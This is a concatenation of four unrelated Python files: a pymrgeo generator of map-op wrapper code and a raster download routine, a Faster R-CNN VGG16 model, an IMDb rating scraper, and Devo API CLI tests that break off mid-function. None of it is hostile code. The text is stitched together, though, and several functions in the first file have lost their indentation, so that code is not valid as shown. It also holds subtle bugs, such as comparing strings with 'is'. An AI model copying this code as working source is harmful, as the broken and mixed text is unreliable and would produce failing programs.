    if len(methods) == 0:
        return None
    signature = _generate_oo_signature(methods)
    generator = CodeGenerator()
    # Signature
    generator.write("def " + name + "(" + signature + "):", post_indent=True)
    _generate_imports(generator, mapop, is_export)
    _generate_calls(generator, methods, is_export=is_export)
    _generate_run(generator, instance, is_export)
    return {name: generator}
def _generate_procedural_method_code(gateway, client, mapop, name, signatures, instance):
    """Generate a procedural-style wrapper (map-op parameter named explicitly
    instead of ``self``) for the Java map-op *mapop*.

    Returns {name: CodeGenerator}, or None when the signatures produce no
    methods.  A leftover debugger stub (``if name == "add": pass``) was
    removed — it had no effect.
    """
    methods = _generate_methods(instance, signatures)
    jvm = gateway.jvm
    cls = JavaClass(mapop, gateway_client=client)
    # Export map ops running against a remote gateway need the extra
    # save-raster download path appended by _generate_run
    is_export = is_remote() and is_instance_of(gateway, cls, jvm.ExportMapOp)
    if len(methods) == 0:
        return None
    signature, self_method = _generate_proc_signature(methods)
    generator = CodeGenerator()
    # Signature
    generator.write("def " + name + "(" + signature + "):", post_indent=True)
    _generate_imports(generator, mapop, is_export)
    _generate_calls(generator, methods, is_export=is_export)
    _generate_run(generator, instance, is_export)
    # Rewrite the generated code so the map-op parameter replaces "self".
    # NOTE(review): this replaces EVERY occurrence of the substring "self"
    # in the generated text, including inside string literals — confirm no
    # generated line legitimately contains "self" in another role.
    code = generator.generate()
    code = code.replace("self", self_method)
    generator.begin()
    for line in code.split("\n"):
        generator.write(line)
    return {name: generator}
def _generate_run(generator, instance, is_export=False):
    """Append the map-op execution epilogue to *generator*.

    For export ops the save-raster download code from _generate_saveraster
    is appended instead; otherwise emits setup/execute/teardown and wraps
    the resulting Java map op in a RasterMapOp or VectorMapOp.
    """
    if is_export:
        ex_generator = _generate_saveraster()
        generator.append(ex_generator)
        # Carry the appended generator's indent level forward
        generator.force_level(generator.get_level() + ex_generator.get_level())
    else:
        # Run the MapOp
        generator.write("if (op.setup(self.job, self.context.getConf()) and", post_indent=True)
        generator.write("op.execute(self.context) and")
        generator.write("op.teardown(self.job, self.context.getConf())):")
        # Return a new python RasterMapOp or VectorMapOp to wrap the Java MapOp
        generator.write("if is_instance_of(self.gateway, op, 'org.mrgeo.mapalgebra.raster.RasterMapOp'):",
                        post_indent=True)
        generator.write(
            "new_resource = RasterMapOp(gateway=self.gateway, context=self.context, mapop=op, job=self.job)",
            post_unindent=True)
        generator.write("elif is_instance_of(self.gateway, op, 'org.mrgeo.mapalgebra.vector.VectorMapOp'):",
                        post_indent=True)
        generator.write(
            "new_resource = VectorMapOp(gateway=self.gateway, context=self.context, mapop=op, job=self.job)",
            post_unindent=True)
        generator.write("else:", post_indent=True)
        generator.write("raise Exception('Unable to wrap a python object around returned map op: ' + str(op))",
                        post_unindent=True)
        generator.write("return new_resource", post_unindent=True)
        generator.write("return None")
    return generator
def _generate_saveraster():
    """Build the generated-code epilogue used by remote export map ops.

    The emitted code runs the op, wraps the result, then downloads the
    raster band-by-band over the gateway (base64 + zlib) and writes a local
    GDAL image.  All emitted strings must stay byte-exact: they are the
    program the client will execute.
    """
    generator = CodeGenerator()
    # generator.write("cls = JavaClass('org.mrgeo.mapalgebra.ExportMapOp', gateway_client=self.gateway._gateway_client)")
    # generator.write(
    #     "if hasattr(self, 'mapop') and self.is_instance_of(self.mapop, 'org.mrgeo.mapalgebra.raster.RasterMapOp') and type(name) is str and isinstance(singleFile, (int, long, float, str)) and isinstance(zoom, (int, long, float)) and isinstance(numTiles, (int, long, float)) and isinstance(mosaic, (int, long, float)) and type(format) is str and isinstance(randomTiles, (int, long, float, str)) and isinstance(tms, (int, long, float, str)) and type(colorscale) is str and type(tileids) is str and type(bounds) is str and isinstance(allLevels, (int, long, float, str)) and isinstance(overridenodata, (int, long, float)):",
    #     post_indent=True)
    # generator.write(
    #     "op = cls.create(self.mapop, str(name), True if singleFile else False, str(""), int(zoom), int(numTiles), int(mosaic), str(format), True if randomTiles else False, True if tms else False, str(colorscale), str(tileids), str(bounds), True if allLevels else False, float(overridenodata))",
    #     post_unindent=True)
    # generator.write("else:", post_indent=True)
    # generator.write("raise Exception('input types differ (TODO: expand this message!)')", post_unindent=True)
    # Run the op and wrap the returned Java map op
    generator.write("if (op.setup(self.job, self.context.getConf()) and", post_indent=True)
    generator.write("op.execute(self.context) and")
    generator.write("op.teardown(self.job, self.context.getConf())):")
    generator.write("if is_instance_of(self.gateway, op, 'org.mrgeo.mapalgebra.raster.RasterMapOp'):", post_indent=True)
    generator.write("new_resource = RasterMapOp(gateway=self.gateway, context=self.context, mapop=op, job=self.job)",
                    post_unindent=True)
    generator.write("elif is_instance_of(self.gateway, op, 'org.mrgeo.mapalgebra.vector.VectorMapOp'):",
                    post_indent=True)
    generator.write("new_resource = VectorMapOp(gateway=self.gateway, context=self.context, mapop=op, job=self.job)",
                    post_unindent=True)
    generator.write("else:", post_indent=True)
    generator.write("raise Exception('Unable to wrap a python object around returned map op: ' + str(op))",
                    post_unindent=True)
    # Choose a GDAL driver and creation options from the requested format
    generator.write("gdalutils = JavaClass('org.mrgeo.utils.GDALUtils', gateway_client=self.gateway._gateway_client)")
    generator.write("java_image = op.image()")
    generator.write("width = java_image.getRasterXSize()")
    generator.write("height = java_image.getRasterYSize()")
    generator.write("options = []")
    generator.write("if format == 'jpg' or format == 'jpeg':", post_indent=True)
    generator.write("driver_name = 'jpeg'")
    generator.write("extension = 'jpg'", post_unindent=True)
    generator.write(
        "elif format == 'tif' or format == 'tiff' or format == 'geotif' or format == 'geotiff' or format == 'gtif' or format == 'gtiff':",
        post_indent=True)
    generator.write("driver_name = 'GTiff'")
    generator.write("options.append('INTERLEAVE=BAND')")
    generator.write("options.append('COMPRESS=DEFLATE')")
    generator.write("options.append('PREDICTOR=1')")
    generator.write("options.append('ZLEVEL=6')")
    generator.write("options.append('TILES=YES')")
    generator.write("if width < 2048:", post_indent=True)
    generator.write("options.append('BLOCKXSIZE=' + str(width))", post_unindent=True)
    generator.write("else:", post_indent=True)
    generator.write("options.append('BLOCKXSIZE=2048')", post_unindent=True)
    generator.write("if height < 2048:", post_indent=True)
    generator.write("options.append('BLOCKYSIZE=' + str(height))", post_unindent=True)
    generator.write("else:", post_indent=True)
    generator.write("options.append('BLOCKYSIZE=2048')", post_unindent=True)
    generator.write("extension = 'tif'", post_unindent=True)
    generator.write("else:", post_indent=True)
    generator.write("driver_name = format")
    generator.write("extension = format", post_unindent=True)
    # Create the local image and copy projection/geotransform metadata
    generator.write("datatype = java_image.GetRasterBand(1).getDataType()")
    generator.write("if not local_name.endswith(extension):", post_indent=True)
    generator.write("local_name += '.' + extension", post_unindent=True)
    generator.write("driver = gdal.GetDriverByName(driver_name)")
    generator.write(
        "local_image = driver.Create(local_name, width, height, java_image.getRasterCount(), datatype, options)")
    generator.write("local_image.SetProjection(str(java_image.GetProjection()))")
    generator.write("local_image.SetGeoTransform(java_image.GetGeoTransform())")
    generator.write("java_nodatas = gdalutils.getnodatas(java_image)")
    generator.write("print('saving image to ' + local_name)")
    generator.write(
        "print('downloading data... (' + str(gdalutils.getRasterBytes(java_image, 1) * local_image.RasterCount / 1024) + ' kb uncompressed)')")
    # Per-band download: base64-decode, gunzip, reinterpret as the GDAL
    # numeric type, reshape to rows and write into the local band
    generator.write("for i in xrange(1, local_image.RasterCount + 1):", post_indent=True)
    generator.write("start = time.time()")
    generator.write("raw_data = gdalutils.getRasterDataAsCompressedBase64(java_image, i, 0, 0, width, height)")
    generator.write("print('compressed/encoded data ' + str(len(raw_data)))")
    generator.write("decoded_data = base64.b64decode(raw_data)")
    generator.write("print('decoded data ' + str(len(decoded_data)))")
    generator.write("decompressed_data = zlib.decompress(decoded_data, 16 + zlib.MAX_WBITS)")
    generator.write("print('decompressed data ' + str(len(decompressed_data)))")
    generator.write("byte_data = numpy.frombuffer(decompressed_data, dtype='b')")
    generator.write("print('byte data ' + str(len(byte_data)))")
    generator.write("image_data = byte_data.view(gdal_array.GDALTypeCodeToNumericTypeCode(datatype))")
    generator.write("print('gdal-type data ' + str(len(image_data)))")
    generator.write("image_data = image_data.reshape((-1, width))")
    generator.write("print('reshaped ' + str(len(image_data)) + ' x ' + str(len(image_data[0])))")
    generator.write("band = local_image.GetRasterBand(i)")
    generator.write("print('writing band ' + str(i))")
    generator.write("band.WriteArray(image_data)")
    generator.write("end = time.time()")
    generator.write("print('elapsed time: ' + str(end - start) + ' sec.')")
    generator.write("band.SetNoDataValue(java_nodatas[i - 1])", post_unindent=True)
    generator.write("local_image.FlushCache()")
    return generator
def _generate_imports(generator, mapop, is_export=False):
# imports
generator.write("from pymrgeo.instance import is_instance_of")
generator.write("from pymrgeo import RasterMapOp")
generator.write("from pymrgeo import VectorMapOp")
generator.write("from numbers import Number")
if is_export:
generator.write("import base64")
generator.write("import numpy")
generator.write("from osgeo import gdal, gdal_array")
generator.write("import time")
generator.write("import zlib")
generator.write("from py4j.java_gateway import JavaClass")
# Get the Java class
generator.write("cls = JavaClass('" + mapop + "', gateway_client=self.gateway._gateway_client)")
def _generate_calls(generator, methods, is_export=False, is_reverse=False):
    """Emit the if/elif chain that type-checks the Python arguments and invokes
    the matching Java create()/rcreate() overload.

    generator  -- CodeGenerator receiving the emitted lines
    methods    -- parsed overloads as produced by _generate_methods()
    is_export  -- when True, the generated code saves the caller-supplied name
                  and builds the image "In-Memory"
    is_reverse -- generate a call to cls.rcreate() instead of cls.create()
    """
    # Check the input params and call the appropriate create() method
    firstmethod = True
    varargcode = CodeGenerator()
    if is_export:
        generator.write("local_name = name")
        generator.write("name = 'In-Memory'")
    for method in methods:
        iftest = ""
        call = []
        firstparam = True
        for param in method:
            # Parameter tuple layout: (name, java type, call name, default, is_vararg)
            var_name = param[0]
            type_name = param[1]
            call_name = param[2]
            default_value = param[3]
            if param[4]:
                # Var-arg parameter: emit code that validates every element of
                # *args (flattening one level of lists) and packs them into a
                # Java array named "array".
                # NOTE(review): varargcode is shared across overloads and never
                # reset, and it is appended once per overload below — confirm
                # that at most one overload per group declares varargs.
                call_name, it, et, accessor = _method_name(type_name, "arg", None)
                varargcode.write("for arg in args:", post_indent=True)
                varargcode.write("if isinstance(arg, list):", post_indent=True)
                varargcode.write("arg_list = arg")
                varargcode.write("for arg in arg_list:", post_indent=True)
                varargcode.write("if not(" + it + "):", post_indent=True)
                varargcode.write("raise Exception('input types differ (TODO: expand this message!)')")
                varargcode.unindent(3)
                varargcode.write("else:", post_indent=True)
                varargcode.write("if not(" + it + "):", post_indent=True)
                varargcode.write("raise Exception('input types differ (TODO: expand this message!)')")
                varargcode.unindent(2)
                varargcode.write("elements = []")
                varargcode.write("for arg in args:", post_indent=True)
                varargcode.write("if isinstance(arg, list):", post_indent=True)
                varargcode.write("for a in arg:", post_indent=True)
                varargcode.write("elements.append(a" + accessor + ")")
                varargcode.unindent(2)
                varargcode.write("else:", post_indent=True)
                varargcode.write("elements.append(arg" + accessor + ")")
                varargcode.unindent(2)
                varargcode.write("array = self.gateway.new_array(self.gateway.jvm." + type_name + ", len(elements))")
                varargcode.write("cnt = 0")
                varargcode.write("for element in elements:", post_indent=True)
                varargcode.write("array[cnt] = element")
                varargcode.write("cnt += 1")
                call_name = "array"
            else:
                # The first parameter of the first overload opens the "if"
                # branch, the first parameter of later overloads opens an
                # "elif"; further parameters extend the test with " and".
                if firstparam:
                    firstparam = False
                    if firstmethod:
                        firstmethod = False
                        iftest += "if"
                    else:
                        iftest += "elif"
                else:
                    iftest += " and"
                if call_name == "self":
                    # The receiver map-op is checked under its real name.
                    var_name = call_name
                call_name, it, et, accessor = _method_name(type_name, var_name, default_value)
                iftest += it
            call += [call_name]
        if len(varargcode) > 0:
            generator.append(varargcode)
        if len(iftest) > 0:
            generator.write(iftest + ":")
            generator.indent()
        if is_reverse:
            generator.write("op = cls.rcreate(" + ", ".join(call) + ')', post_unindent=True)
        else:
            generator.write("op = cls.create(" + ", ".join(call) + ')', post_unindent=True)
    # Close the chain: none of the overload signatures matched the arguments.
    generator.write("else:", post_indent=True)
    generator.write("raise Exception('input types differ (TODO: expand this message!)')", post_unindent=True)
    # code += "    import inspect\n"
    # code += "    method = inspect.stack()[0][3]\n"
    # code += "    print(method)\n"
def _method_name(type_name, var_name, default_value):
if type_name == "String":
phrase = " type(" + var_name + ") is str"
if (default_value is not None and default_value == 'None'):
iftest = " (" + var_name + " is None or" + phrase + ")"
else:
iftest = phrase
# call_name = "str(" + var_name + ")"
call_name = "str(" + var_name + ") if (" + var_name + " is not None) else None"
excepttest = "not" + iftest
accessor = ""
elif type_name == "double" or type_name == "float":
iftest = " isinstance(" + var_name + ", (int, long, float))"
# call_name = "float(" + var_name + ")"
call_name = "float(" + var_name + ") if (" + var_name + " is not None) else None"
excepttest = "not" + iftest
accessor = ""
elif type_name == "long":
iftest = " isinstance(" + var_name + ", (int, long, float))"
# call_name = "long(" + var_name + ")"
call_name = "long(" + var_name + ") if (" + var_name + " is not None) else None"
excepttest = "not" + iftest
accessor = ""
elif type_name == "int" or type_name == "Short" or type_name == "Char":
iftest = " isinstance(" + var_name + ", (int, long, float))"
# call_name = "int(" + var_name + ")"
call_name = "int(" + var_name + ") if (" + var_name + " is not None) else None"
excepttest = "not" + iftest
accessor = ""
elif type_name == "boolean":
iftest = " isinstance(" + var_name + ", (int, long, float, str))"
call_name = "True if " + var_name + " else False"
excepttest = "not" + iftest
accessor = ""
elif type_name.endswith("MapOp"):
base_var = var_name
var_name += ".mapop"
phrase = " hasattr(" + base_var + ", 'mapop') and self.is_instance_of(" + var_name + ", '" + type_name + "')"
if (default_value is not None and default_value == 'None'):
iftest = " (" + var_name + " is None or" + phrase + ")"
else:
iftest = phrase
call_name = var_name
excepttest = " hasattr(" + base_var + ", 'mapop') and not self.is_instance_of(" + \
var_name + ", '" + type_name + "')"
accessor = ".mapop"
else:
phrase = " self.is_instance_of(" + var_name + ", '" + type_name + "')"
if (default_value is not None and default_value == 'None'):
iftest = " (" + var_name + " is None or" + phrase + ")"
else:
iftest = phrase
call_name = var_name
excepttest = "not" + iftest
accessor = ""
return call_name, iftest, excepttest, accessor
def _generate_methods(instance, signatures):
methods = []
for sig in signatures:
found = False
method = []
for variable in sig.split("|"):
# print("variable: " + variable)
names = re.split("[:=]+", variable)
new_name = names[0]
new_type = names[1]
# var args?
varargs = False
if new_type.endswith("*"):
new_type = new_type[:-1]
new_name = "args"
varargs = True
if len(names) == 3:
if names[2].lower() == "true":
new_value = "True"
elif names[2].lower() == "false":
new_value = "False"
elif names[2].lower() == "infinity":
new_value = "float('inf')"
elif names[2].lower() == "-infinity":
new_value = "float('-inf')"
elif names[2].lower() == "null":
new_value = "None"
else:
new_value = names[2]
else:
new_value = None
if ((not found) and
(new_type.endswith("MapOp") or
(instance is "RasterMapOp" and new_type.endswith("RasterMapOp")) or
(instance is "VectorMapOp" and new_type.endswith("VectorMapOp")))):
found = True
new_call = "self"
else:
new_call = new_name
tup = (new_name, new_type, new_call, new_value, varargs)
method.append(tup)
methods.append(method)
return methods
def _in_signature(param, signature):
for s in signature:
if s[0] == param[0]:
if s[1] == param[1]:
if s[3] == param[3]:
return True
else:
raise Exception("only default values differ: " + str(s) + ": " + str(param))
else:
raise Exception("type parameters differ: " + s[1] + ": " + param[1])
return False
def _generate_oo_signature(methods):
    """Build the Python parameter list for the object-oriented wrapper method.

    Merges the parameters of every overload (skipping the receiver, which
    becomes "self"); with multiple overloads every merged parameter without an
    explicit default becomes optional (=None) so any overload can be selected.
    Returns the comma-joined signature string, starting with "self".
    """
    collected = []
    multiple = len(methods) > 1
    for method in methods:
        for param in method:
            if param[2] != "self" and not _in_signature(param, collected):
                collected.append(param)
            if param[4]:
                # var args must be the last parameter
                break
    parts = ["self"]
    for entry in collected:
        name, default, is_vararg = entry[0], entry[3], entry[4]
        if is_vararg:
            parts.append("*args")
        elif default is not None:
            if default.endswith("NaN"):
                # Java NaN defaults have no literal spelling in Python.
                parts.append(name + "=float('nan')")
            else:
                parts.append(name + "=" + default)
        elif multiple:
            parts.append(name + "=None")
        else:
            parts.append(name)
    return ",".join(parts)
def _generate_proc_signature(methods):
    """Build the parameter list for the procedural (module-level) wrapper.

    Unlike the OO variant, the receiver map-op appears as a real, named, and
    always-required parameter (the first "self" parameter encountered).

    Returns (signature_string, self_var) where self_var is the name of the
    receiver parameter, or None when no overload declares one.
    """
    signature = []
    # With several overloads every non-receiver parameter becomes optional.
    dual = len(methods) > 1
    self_var = None
    for method in methods:
        for param in method:
            # Collect the first receiver and every unique non-receiver param.
            # FIX: comparisons against None now use "is" (PEP 8 E711) instead
            # of "==".
            if (param[2] != "self" or self_var is None) and not _in_signature(param, signature):
                signature.append(param)
            if param[2] == "self" and self_var is None:
                self_var = param[0]
            if param[4]:
                # var args must be the last parameter
                break
    sig = []
    for s in signature:
        if s[4]:
            sig += ["*args"]
        elif s[3] is not None:
            if s[3].endswith("NaN"):
                # Java NaN defaults have no literal spelling in Python.
                sig += [s[0] + "=float('nan')"]
            else:
                sig += [s[0] + "=" + s[3]]
        elif dual and s[0] != self_var:
            # Overloads force a None default, but the receiver stays required.
            sig += [s[0] + "=None"]
        else:
            sig += [s[0]]
    return ",".join(sig), self_var
|
from __future__ import absolute_import
import torch as t
from torch import nn
from torchvision.models import vgg16
from model.region_proposal_network import RegionProposalNetwork
from model.faster_rcnn import FasterRCNN
from model.roi_module import RoIPooling2D
from utils import array_tool as at
from utils.config import opt
def decom_vgg16():
    """Split a (possibly pre-trained) VGG16 into feature extractor + classifier.

    Returns (features, classifier): `features` covers the layers up to the
    ReLU after conv5_3; `classifier` is the fully connected head with the
    final class-score layer (and, unless opt.use_drop, both dropouts) removed.
    The first four conv layers are frozen.
    """
    # the 30th layer of features is relu of conv5_3
    # Use the Caffe-converted pre-trained weights when configured to.
    if opt.caffe_pretrain:
        model = vgg16(pretrained=False)
        if not opt.load_path:
            # Load the Caffe-converted parameter file from disk.
            model.load_state_dict(t.load(opt.caffe_pretrain_path))
    else:
        # Let torchvision download weights unless a checkpoint will be loaded.
        model = vgg16(not opt.load_path)
    # Keep everything up to (and including) conv5_3's ReLU.
    features = list(model.features)[:30]
    classifier = model.classifier
    # Work on the classifier as a mutable list of layers.
    classifier = list(classifier)
    # Drop the final 1000-way class-score layer.
    del classifier[6]
    # Drop the two dropout layers when dropout is disabled.
    if not opt.use_drop:
        del classifier[5]
        del classifier[2]
    classifier = nn.Sequential(*classifier)
    # Freeze the first two stages (first 10 modules): no backprop through them.
    for layer in features[:10]:
        for p in layer.parameters():
            p.requires_grad = False
    # Return the feature-extraction trunk and the classification head.
    return nn.Sequential(*features), classifier
class FasterRCNNVGG16(FasterRCNN):
    """Faster R-CNN with a VGG16 backbone.

    Instantiates and wires together the VGG16 feature extractor and
    classifier, the region proposal network, and the VGG16RoIHead.
    """

    # VGG16 downsamples 16x over its five stages (output of conv5).
    feat_stride = 16  # downsample 16x for output of conv5 in vgg16

    def __init__(self,
                 n_fg_class=20,
                 ratios=None,
                 anchor_scales=None
                 ):
        """
        n_fg_class    -- number of foreground classes (background is added
                         internally, giving n_fg_class + 1 head outputs)
        ratios        -- anchor aspect ratios; defaults to [0.5, 1, 2]
        anchor_scales -- anchor scales; defaults to [8, 16, 32]
        """
        # FIX: avoid mutable default arguments — materialize defaults per call.
        if ratios is None:
            ratios = [0.5, 1, 2]
        if anchor_scales is None:
            anchor_scales = [8, 16, 32]
        # conv5_3 trunk and the fully connected classifier head.
        extractor, classifier = decom_vgg16()
        # RPN produces rpn_locs, rpn_scores, rois, roi_indices, anchor.
        rpn = RegionProposalNetwork(
            512, 512,
            ratios=ratios,
            anchor_scales=anchor_scales,
            feat_stride=self.feat_stride,
        )
        head = VGG16RoIHead(
            n_class=n_fg_class + 1,
            roi_size=7,
            spatial_scale=(1. / self.feat_stride),
            classifier=classifier
        )
        super(FasterRCNNVGG16, self).__init__(
            extractor,
            rpn,
            head,
        )
class VGG16RoIHead(nn.Module):
    """RoI head for Faster R-CNN with a VGG16 backbone.

    Pools each region of interest to a fixed roi_size x roi_size window and
    runs it through the VGG16 classifier to produce per-class bounding-box
    offsets and class scores.
    """

    def __init__(self, n_class, roi_size, spatial_scale,
                 classifier):
        # n_class includes the background
        super(VGG16RoIHead, self).__init__()
        # The last two fully connected layers taken from VGG16.
        self.classifier = classifier
        # Per-class box regression: 4 offsets per class (4096 -> n_class * 4).
        self.cls_loc = nn.Linear(4096, n_class * 4)
        # Per-class score, background included (4096 -> n_class).
        self.score = nn.Linear(4096, n_class)
        # Initialize the new fully connected layers.
        normal_init(self.cls_loc, 0, 0.001)
        normal_init(self.score, 0, 0.01)
        # Total class count, background included (e.g. 21 for VOC).
        self.n_class = n_class
        # Output spatial size of RoI pooling (e.g. 7 -> 7x7).
        self.roi_size = roi_size
        # Feature-map-to-image scale (e.g. 1/16 for VGG16).
        self.spatial_scale = spatial_scale
        # RoI pooling turns each variable-sized RoI into a fixed
        # roi_size x roi_size feature (CuPy-compiled implementation).
        self.roi = RoIPooling2D(self.roi_size, self.roi_size, self.spatial_scale)

    def forward(self, x, rois, roi_indices):
        """Pool each RoI from x and return (roi_cls_locs, roi_scores).

        roi_indices maps each roi to its image in the batch; with batch size 1
        it is effectively redundant. Assumes rois are (y1, x1, y2, x2) rows —
        TODO confirm against the proposal layer.
        """
        # in case roi_indices is ndarray
        roi_indices = at.totensor(roi_indices).float()  # ndarray -> tensor
        rois = at.totensor(rois).float()
        # Prepend the batch index column: rows become (index, y1, x1, y2, x2).
        indices_and_rois = t.cat([roi_indices[:, None], rois], dim=1)
        # NOTE: important: yx->xy — reorder columns to (index, x1, y1, x2, y2).
        xy_indices_and_rois = indices_and_rois[:, [0, 2, 1, 4, 3]]
        # contiguous(): views/permutes may leave the tensor non-contiguous in
        # memory; the RoI module needs a contiguous buffer.
        indices_and_rois = xy_indices_and_rois.contiguous()
        # Fixed-size pooled features for every RoI.
        pool = self.roi(x, indices_and_rois)
        # Flatten to (num_rois, 512 * roi_size * roi_size) for the FC head.
        pool = pool.view(pool.size(0), -1)
        # VGG16 classifier from decom_vgg16(): outputs 4096 features.
        fc7 = self.classifier(pool)
        # (4096 -> n_class * 4) per-class box offsets.
        roi_cls_locs = self.cls_loc(fc7)
        # (4096 -> n_class) per-class scores.
        roi_scores = self.score(fc7)
        return roi_cls_locs, roi_scores
def normal_init(m, mean, stddev, truncated=False):
    """Fill a layer's weight with (optionally truncated) normal noise and zero its bias.

    m         -- module with .weight and .bias parameters (e.g. nn.Linear)
    mean      -- mean of the normal distribution
    stddev    -- standard deviation
    truncated -- when True, approximate a truncated normal via fmod(2)
    """
    weight = m.weight.data
    if not truncated:
        weight.normal_(mean, stddev)
    else:
        # Sample N(0, 1), clamp into (-2, 2) via fmod, then rescale/shift —
        # a rough truncated-normal approximation.
        weight.normal_().fmod_(2).mul_(stddev).add_(mean)
    m.bias.data.zero_()
|
# python script that recalculates rating of imdb listing
# coded using python 3.6 with Spyder by <NAME> on 2017
import requests
import math
from bs4 import BeautifulSoup # html parser
# temporary algorithm to determine better score
def adjustExtremes(num10, num1, numPos, numNeg, numTotal):
    """Dampen the influence of extreme (10-star and 1-star) votes.

    Returns [adjusted_num10, adjusted_num1, adjusted_total, summary_prefix].
    Heavily polarized listings (extremes above a third of all votes) are
    handed to removeExtremes() for the stronger correction.
    """
    # Nothing to adjust without votes.
    if numTotal <= 0:
        return [0, 0, 0, "!No ratings available!"]
    # Polarized vote distribution: drop the extremes entirely.
    if (num1 + num10) / numTotal > 0.33:
        return removeExtremes(num10, num1, numPos, numNeg, numTotal)
    prefix = ("Overall positive reception for "
              if numPos > numNeg else "Overall negative reception for ")
    # Halve the 10-star votes when positives exceed 10% of the total.
    if numPos / numTotal > 0.1:
        numTotal -= num10
        num10 = math.floor(num10 / 2)
        numTotal += num10
    # Likewise halve the 1-star votes (against the already-adjusted total).
    if numNeg / numTotal > 0.1:
        numTotal -= num1
        num1 = math.floor(num1 / 2)
        numTotal += num1
    return [num10, num1, numTotal, prefix]
def removeExtremes(num10, num1, numPos, numNeg, numTotal):
    """Discard all 10-star and 1-star votes and report the corrected total."""
    remaining = numTotal - num10 - num1
    return [0, 0, remaining, "Vote weights were corrected for "]
# average calculation
def findMMM(array, total):
    """Return a "Mean/Median/Mode" summary string for a rating histogram.

    array -- 10 counts, where array[i] holds the votes for rating (10 - i)
    total -- total number of votes; when 0 an error string is returned
    """
    # Mode: the rating with the highest count (highest rating wins ties,
    # since only a strictly larger count replaces the current best).
    best_count = 0
    best_index = 0
    for index, count in enumerate(array):
        if count > best_count:
            best_count = count
            best_index = index
    mode = 10 - best_index
    # Median: walk cumulative counts until the half-way vote is reached.
    median = math.floor(total / 2)
    running = 0
    for index, count in enumerate(array):
        running += count
        if running >= median:
            median = 10 - index
            break
    # Weighted mean of the ratings.
    mean = sum(count * (10 - index) for index, count in enumerate(array))
    if total == 0:
        return "!Insufficient ratings!"
    mean = round(mean / total, 2)
    return "Mean: " + str(mean) + " Median: " + str(median) + " Mode: " + str(mode)
def getRatings(title):
    """Fetch the IMDb rating histogram for a title and return an adjusted summary.

    title -- [imdb_id, display_name]
    Returns a human-readable string combining the adjustExtremes() prefix and
    the findMMM() mean/median/mode summary.
    """
    url = "http://www.imdb.com/title/" + title[0] + "/ratings"
    myRequest = requests.get(url)
    myParsed = BeautifulSoup(myRequest.content, "html.parser")
    div = myParsed.find('div', {"class": 'title-ratings-sub-page'})
    table = div.find_all('table')
    # Each "leftAligned" cell of the first table holds one bucket's vote count.
    lis = table[0].find_all("div", {"class": "leftAligned"})
    # num[0] holds the 10-star count, num[9] the 1-star count.
    y = -1  # the first cell is a header row, so start one step early
    num = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    for tag in lis:
        if 0 <= y <= 9:
            try:
                num[y] = int(tag.text.replace(',', ''))
            # FIX: int() raises ValueError on non-numeric cell text; the
            # original only caught AttributeError and would crash.
            except (AttributeError, ValueError):
                pass  # malformed cell: keep the 0 default
        y = y + 1
    # Aggregate positives (6-10 stars) and negatives (1-5 stars), then let
    # adjustExtremes() rebalance the extreme buckets.
    numPos = num[0] + num[1] + num[2] + num[3] + num[4]
    numNeg = num[9] + num[8] + num[7] + num[6] + num[5]
    numTot = numPos + numNeg
    array = adjustExtremes(num[0], num[9], numPos, numNeg, numTot)
    num[0] = array[0]
    num[9] = array[1]
    numTot = array[2]
    return array[3] + title[1] + ":\n\n " + findMMM(num, numTot)
def findID(stringIN, index):
    """Search IMDb for stringIN and rate the index-th title in the results.

    Returns getRatings()'s summary string, or an error message when the
    result list has no usable entry at the requested index.
    """
    search_url = "http://www.imdb.com/find?q=" + stringIN + "&s=tt"
    response = requests.get(search_url)
    parsed = BeautifulSoup(response.content, "html.parser")
    result_cells = parsed.find_all('td', {"class": 'result_text'})
    try:
        # The title id is the third '/'-separated piece of the cell's HTML
        # (e.g. <td ...><a href="/title/tt0000000/...").
        href_parts = str(result_cells[index]).split('/', 3)
        title_name = result_cells[index].text.split(' aka', 2)
        return getRatings([href_parts[2], title_name[0]])
    except IndexError:
        return "No title found! Did you check your spelling?"
|
<filename>tests/api/cli.py
import unittest
import os
from click.testing import CliRunner
from devo.common import Configuration
from devo.api.scripts.client_cli import query
from devo.api.client import ERROR_MSGS, DevoClientException
class TestApi(unittest.TestCase):
    """Integration tests for the `devo api` CLI query command.

    Endpoint and credentials come from DEVO_API_* environment variables;
    most tests hit the live API, so they need network access and a valid
    key/secret pair.
    """

    def setUp(self):
        # Fixture values: a trivial one-row query plus endpoint/credentials.
        self.query = 'from demo.ecommerce.data select * limit 1'
        self.app_name = "testing-app_name"
        self.uri = os.getenv('DEVO_API_ADDRESS',
                             'https://apiv2-us.devo.com/search/query')
        self.key = os.getenv('DEVO_API_KEY', None)
        self.secret = os.getenv('DEVO_API_SECRET', None)
        self.token = os.getenv('DEVO_AUTH_TOKEN', None)
        self.query_id = os.getenv('DEVO_API_QUERYID', None)
        self.user = os.getenv('DEVO_API_USER', "python-sdk-user")
        self.comment = os.getenv('DEVO_API_COMMENT', None)
        configuration = Configuration()
        configuration.set("api", {
            "query": self.query, "address": self.uri,
            "key": self.key, "secret": self.secret, "token": self.token,
            "query_id": self.query_id, "user": self.user,
            "comment": self.comment, "app_name": self.app_name
        })
        # Persist the config so test_with_config_file can load it back.
        self.config_path = "/tmp/devo_api_tests_config.json"
        configuration.save(path=self.config_path)

    def test_query_args(self):
        """Invoking with no arguments reports the missing endpoint."""
        runner = CliRunner()
        result = runner.invoke(query, [])
        self.assertIn(ERROR_MSGS['no_endpoint'], result.stdout)

    def test_not_credentials(self):
        """A query without key/secret/token fails with a 500 no-auth error."""
        runner = CliRunner()
        result = runner.invoke(query, ["--debug",
                                       "--from", "2018-01-01",
                                       "--query", "from demo.ecommerce.data "
                                                  "select timestamp limit 1",
                                       "--address", self.uri])
        self.assertIsInstance(result.exception, DevoClientException)
        self.assertEqual(result.exception.args[0]['status'], 500)
        self.assertIn(ERROR_MSGS['no_auth'],
                      result.exception.args[0]['object'])

    def test_bad_url(self):
        """An unreachable endpoint surfaces as a DevoClientException (500)."""
        runner = CliRunner()
        result = runner.invoke(query, ["--debug",
                                       "--from", "2018-01-01",
                                       "--query", "from demo.ecommerce.data "
                                                  "select timestamp limit 1",
                                       "--address", "error-apiv2-us.logtrust"
                                                    ".com/search/query",
                                       "--key", self.key,
                                       "--secret", self.secret])
        self.assertIsInstance(result.exception, DevoClientException)
        self.assertEqual(result.exception.args[0]['status'], 500)

    def test_bad_credentials(self):
        """A wrong API key is rejected with a 401."""
        runner = CliRunner()
        result = runner.invoke(query, ["--debug",
                                       "--from", "2018-01-01",
                                       "--query", "from demo.ecommerce.data "
                                                  "select timestamp limit 1",
